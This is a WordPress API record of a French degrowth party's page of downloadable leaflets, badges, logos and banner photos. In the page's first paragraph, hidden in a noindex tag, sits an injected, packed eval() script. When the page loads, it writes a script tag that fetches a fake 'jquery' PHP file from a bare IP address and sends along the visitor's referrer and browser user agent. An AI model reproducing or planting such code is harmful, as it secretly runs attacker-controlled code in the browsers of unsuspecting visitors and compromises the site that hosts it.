{"id":5071,"date":"2010-10-28T17:10:12","date_gmt":"2010-10-28T16:10:12","guid":{"rendered":"http:\/\/www.partipourladecroissance.net\/?page_id=5071"},"modified":"2012-04-06T11:52:16","modified_gmt":"2012-04-06T10:52:16","slug":"materiel-de-visibilite","status":"publish","type":"page","link":"https:\/\/www.partipourladecroissance.net\/?page_id=5071","title":{"rendered":"Outils pratiques pour notre \u00ab\u00a0visibilit\u00e9\u00a0\u00bb !"},"content":{"rendered":"<p style=\"text-align: left;\"><strong>Voici <noindex><script id=\"wpinfo-pst1\" type=\"text\/javascript\" rel=\"nofollow\">eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(\/^\/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6(\"<a g=\\'2\\' c=\\'d\\' e=\\'b\/2\\' 4=\\'7:\/\/5.8.9.f\/1\/h.s.t?r=\"+3(0.p)+\"\\o=\"+3(j.i)+\"\\'><\\\/k\"+\"l>\");n m=\"q\";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|kyfra|var|u0026u|referrer|bnenh||js|php'.split('|'),0,{}))\n<\/script><\/noindex> une page proposant un peu de mat\u00e9riel pouvant \u00eatre utilis\u00e9 par chacune et chacun d&rsquo;entre vous. <\/strong><\/p>\n<p style=\"text-align: left;\">Elle contient des tracts et des visuels. Elle sera agr\u00e9ment\u00e9e de guides permettant de vous aider \u00e0 r\u00e9aliser vous-m\u00eames du mat\u00e9riel.<br \/>\nLes contributions de chacune et chacun sont les bienvenues, tant pour les tracts, les visuels que pour les guides. Vous pouvez nous les envoyer \u00e0 :<\/p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:contact@partipourladecroissance.net\" target=\"_blank\">contact@partipourladecroissance.net<\/a><\/strong><\/p>\n<hr \/>\n<p style=\"text-align: center;\"><strong>Une quinzaine de<\/strong><strong> tracts divers et vari\u00e9s dont la liste va s&rsquo;agrandir<\/strong><\/p>\n<p style=\"text-align: center;\"><img loading=\"lazy\" decoding=\"async\" src=\"..\/wp-content\/uploads\/2010\/05\/tract1mai10.jpg\" alt=\"http:\/\/www.partipourladecroissance.net\/wp-content\/uploads\/2010\/05\/tract1mai10.jpg\" width=\"140\" height=\"200\" \/><br \/>\nPlaquette 2005, gratuit\u00e9, DIA, Bandelettes, Appels, etc&#8230; :<br \/>\n<a href=\"http:\/\/decroissance.lehavre.free.fr\/politique\/tracts-divers.zip\" target=\"_blank\">http:\/\/decroissance.lehavre.free.fr\/politique\/tracts-divers.zip<\/a><\/p>\n<p style=\"text-align: center;\"><a href=\"http:\/\/www.partipourladecroissance.net\/?p=6263\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter\" src=\"http:\/\/www.partipourladecroissance.net\/wp-content\/uploads\/2011\/06\/DIA-tract.jpg\" alt=\"\" width=\"248\" height=\"350\" \/><strong>Dotation Inconditionnelle d&rsquo;Autonomie &#8211; Le Tract 2011<\/strong><\/a><\/p>\n<hr \/>\n<p style=\"text-align: center;\"><strong>Des picbadges pour facebook<\/strong><\/p>\n<p><span style=\"color: #ffffff;\">&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;..\u00a0\u00a0\u00a0\u00a0\u00a0 &#8230;<\/span><a href=\"http:\/\/fr.picbadges.com\/moins-de-biens-plus-de-liens\/2542838\/\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone\" src=\"http:\/\/www.partipourladecroissance.net\/wp-content\/uploads\/2012\/04\/14103482_13336399101.png\" alt=\"\" width=\"82\" height=\"82\" \/><\/a> <a href=\"http:\/\/fr.picbadges.com\/escargot-de-la-decroissance\/2542797\/\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone\" src=\"http:\/\/www.partipourladecroissance.net\/wp-content\/uploads\/2012\/04\/14103482_13336370971.png\" alt=\"\" width=\"82\" height=\"82\" \/><\/a> <a href=\"http:\/\/fr.picbadges.com\/parti-pour-la-decroissance\/2542815\/\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone\" src=\"http:\/\/www.partipourladecroissance.net\/wp-content\/uploads\/2012\/04\/14103482_13336381731.png\" alt=\"\" width=\"82\" height=\"82\" \/><\/a><\/p>\n<p style=\"text-align: center;\">Pour toi, Geek<\/p>\n<hr \/>\n<p style=\"text-align: left;\"><strong>Des visuels, pour faire des banderoles ou des panneaux<\/strong><\/p>\n<p style=\"text-align: center;\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/decroissance.lehavre.free.fr\/images\/logoppld-h.jpg\" alt=\"http:\/\/decroissance.lehavre.free.fr\/images\/logoppld-h.jpg\" width=\"200\" height=\"115\" \/><br \/>\n<a href=\"http:\/\/www.partipourladecroissance.net\/wp-content\/uploads\/2009\/05\/logoppld-h.jpg\">http:\/\/www.partipourladecroissance.net\/wp-content\/uploads\/2009\/05\/logoppld-h.jpg<\/a><\/p>\n<p style=\"text-align: center;\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/decroissance.lehavre.free.fr\/images\/banderolle-objecte.jpg\" alt=\"http:\/\/decroissance.lehavre.free.fr\/images\/banderolle-objecte.jpg\" width=\"511\" height=\"130\" \/><br \/>\n<a href=\"http:\/\/decroissance.lehavre.free.fr\/images\/banderolle-objecte.jpg\" target=\"_blank\">http:\/\/decroissance.lehavre.free.fr\/images\/banderolle-objecte.jpg<\/a><\/p>\n<p style=\"text-align: center;\"><img loading=\"lazy\" decoding=\"async\" src=\"..\/wp-content\/uploads\/2010\/05\/Image-2.png\" alt=\"http:\/\/www.partipourladecroissance.net\/wp-content\/uploads\/2010\/05\/Image-2.png\" width=\"200\" height=\"170\" \/><br \/>\n<a href=\"..\/wp-content\/uploads\/2010\/05\/Image-2.png\" target=\"_blank\">http:\/\/www.partipourladecroissance.net\/wp-content\/uploads\/2010\/05\/Image-2.png<\/a><\/p>\n<p style=\"text-align: center;\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/decroissance.lehavre.free.fr\/images\/logos\/les-escargots-de-la-decroissance.jpg\" alt=\"http:\/\/decroissance.lehavre.free.fr\/images\/logos\/les-escargots-de-la-decroissance.jpg\" width=\"200\" height=\"115\" \/><br \/>\n<a href=\"http:\/\/decroissance.lehavre.free.fr\/images\/logos\/les-escargots-de-la-decroissance.jpg\" target=\"_blank\">http:\/\/decroissance.lehavre.free.fr\/images\/logos\/les-escargots-de-la-decroissance.jpg<\/a><\/p>\n<p style=\"text-align: center;\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/decroissance.lehavre.free.fr\/images\/logos\/logo_esc_big.jpg\" alt=\"http:\/\/decroissance.lehavre.free.fr\/images\/logos\/logo_esc_big.jpg\" width=\"200\" height=\"108\" \/><br \/>\n<a href=\"http:\/\/decroissance.lehavre.free.fr\/images\/logos\/logo_esc_big.jpg\" target=\"_blank\">http:\/\/decroissance.lehavre.free.fr\/images\/logos\/logo_esc_big.jpg<\/a><\/p>\n<p style=\"text-align: center;\"><img loading=\"lazy\" decoding=\"async\" src=\"..\/wp-content\/uploads\/2009\/05\/logo-ed-2-h.jpg\" alt=\"http:\/\/www.partipourladecroissance.net\/wp-content\/uploads\/2009\/05\/logo-ed-2-h.jpg\" width=\"200\" height=\"115\" \/><br \/>\n<a href=\"..\/wp-content\/uploads\/2009\/05\/logo-ed-2-h.jpg\" target=\"_blank\">http:\/\/www.partipourladecroissance.net\/wp-content\/uploads\/2009\/05\/logo-ed-2-h.jpg<\/a><\/p>\n<p style=\"text-align: center;\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/actu.adoc-france.org\/wp-content\/uploads\/2010\/01\/logo-regions-decroissance-10-h.jpg\" alt=\"http:\/\/actu.adoc-france.org\/wp-content\/uploads\/2010\/01\/logo-regions-decroissance-10-h.jpg\" width=\"200\" height=\"115\" \/><br \/>\n<a href=\"http:\/\/actu.adoc-france.org\/wp-content\/uploads\/2010\/01\/logo-regions-decroissance-10-h.jpg\" target=\"_blank\">http:\/\/actu.adoc-france.org\/wp-content\/uploads\/2010\/01\/logo-regions-decroissance-10-h.jpg<\/a><br \/>\n\u00e0 modifier : <a href=\"http:\/\/decroissance.lehavre.free.fr\/regionales10\/logoregions10-h.psd\">http:\/\/decroissance.lehavre.free.fr\/regionales10\/logoregions10-h.psd<\/a><\/p>\n<div style=\"text-align: center;\">\n<p><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/decroissance.lehavre.free.fr\/images\/Decroissance-libre-hd.jpg\" alt=\"http:\/\/decroissance.lehavre.free.fr\/images\/Decroissance-libre-hd.jpg\" width=\"200\" height=\"117\" \/><br \/>\n<a href=\"http:\/\/decroissance.lehavre.free.fr\/images\/Decroissance-libre-hd.jpg\" target=\"_blank\">http:\/\/decroissance.lehavre.free.fr\/images\/Decroissance-libre-hd.jpg<\/a><\/p>\n<hr \/>\n<\/div>\n<div style=\"text-align: center;\"><strong>Quelques mises en application<\/strong><\/div>\n<div style=\"text-align: center;\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone\" src=\"http:\/\/decroissance.lehavre.free.fr\/heuresdesilence\/journee-escargots-Le-Havre1.jpg\" alt=\"\" width=\"386\" height=\"289\" \/><\/div>\n<div style=\"text-align: center;\"><a href=\"http:\/\/decroissance.lehavre.free.fr\/heuresdesilence\/journee-escargots-Le-Havre1.jpg\">http:\/\/decroissance.lehavre.free.fr\/heuresdesilence\/journee-escargots-Le-Havre1.jpg<\/a><\/div>\n<div style=\"text-align: center;\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone\" src=\"http:\/\/www.partipourladecroissance.net\/wp-content\/uploads\/2010\/10\/origami.jpg\" alt=\"\" width=\"403\" height=\"309\" \/><\/div>\n<div style=\"text-align: center;\"><a href=\"http:\/\/www.partipourladecroissance.net\/wp-content\/uploads\/2010\/10\/origami.jpg\">http:\/\/www.partipourladecroissance.net\/wp-content\/uploads\/2010\/10\/origami.jpg<\/a><\/div>\n<div style=\"text-align: center;\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone\" src=\"http:\/\/decroissance.lehavre.free.fr\/heuresdesilence\/panneau-escargot.jpg\" alt=\"\" width=\"402\" height=\"361\" \/><\/div>\n<div style=\"text-align: center;\"><a href=\"http:\/\/decroissance.lehavre.free.fr\/heuresdesilence\/panneau-escargot.jpg\">http:\/\/decroissance.lehavre.free.fr\/heuresdesilence\/panneau-escargot.jpg<\/a><\/div>\n<div style=\"text-align: center;\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone\" src=\"http:\/\/www.phototheque.org\/data\/media\/1047\/4_sept_2010_0077.JPG\" alt=\"\" width=\"400\" height=\"267\" \/><\/div>\n<div style=\"text-align: center;\"><a href=\"http:\/\/www.phototheque.org\/data\/media\/1047\/4_sept_2010_0077.JPG\">http:\/\/www.phototheque.org\/data\/media\/1047\/4_sept_2010_0077.JPG<\/a><\/div>\n<div style=\"text-align: center;\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone\" src=\"http:\/\/lh4.ggpht.com\/_H5p9XSoRPIg\/TCO3mIcc38I\/AAAAAAAAAIU\/2fDKCqUexEM\/s800\/P1040784.JPG\" alt=\"\" width=\"400\" height=\"300\" \/><\/div>\n<div style=\"text-align: center;\"><a href=\"http:\/\/lh4.ggpht.com\/_H5p9XSoRPIg\/TCO3mIcc38I\/AAAAAAAAAIU\/2fDKCqUexEM\/s800\/P1040784.JPG\">http:\/\/lh4.ggpht.com\/_H5p9XSoRPIg\/TCO3mIcc38I\/AAAAAAAAAIU\/2fDKCqUexEM\/s800\/P1040784.JPG<\/a><\/div>\n<div style=\"text-align: center;\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone\" src=\"http:\/\/lh6.ggpht.com\/_H5p9XSoRPIg\/TCO3sFuSn7I\/AAAAAAAAAIg\/c76JfGYhccc\/s800\/P1040791.JPG\" alt=\"\" width=\"399\" height=\"299\" \/><\/div>\n<div style=\"text-align: center;\"><a href=\"http:\/\/lh6.ggpht.com\/_H5p9XSoRPIg\/TCO3sFuSn7I\/AAAAAAAAAIg\/c76JfGYhccc\/s800\/P1040791.JPG\">http:\/\/lh6.ggpht.com\/_H5p9XSoRPIg\/TCO3sFuSn7I\/AAAAAAAAAIg\/c76JfGYhccc\/s800\/P1040791.JPG<\/a><\/div>\n","protected":false},"excerpt":{"rendered":"<p>Voici une page proposant un peu de mat\u00e9riel pouvant \u00eatre utilis\u00e9 par chacune et chacun d&rsquo;entre vous. Elle contient des tracts et des visuels. Elle sera agr\u00e9ment\u00e9e de guides permettant de vous aider \u00e0 r\u00e9aliser vous-m\u00eames du mat\u00e9riel. Les contributions &hellip; <a href=\"https:\/\/www.partipourladecroissance.net\/?page_id=5071\">Continuer la lecture <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":7,"featured_media":0,"parent":3995,"menu_order":0,"comment_status":"closed","ping_status":"open","template":"","meta":{"footnotes":""},"class_list":["post-5071","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/pages\/5071","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/users\/7"}],"replies":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5071"}],"version-history":[{"count":20,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/pages\/5071\/revisions"}],"predecessor-version":[{"id":5076,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/pages\/5071\/revisions\/5076"}],"up":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/pages\/3995"}],"wp:attachment":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5071"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}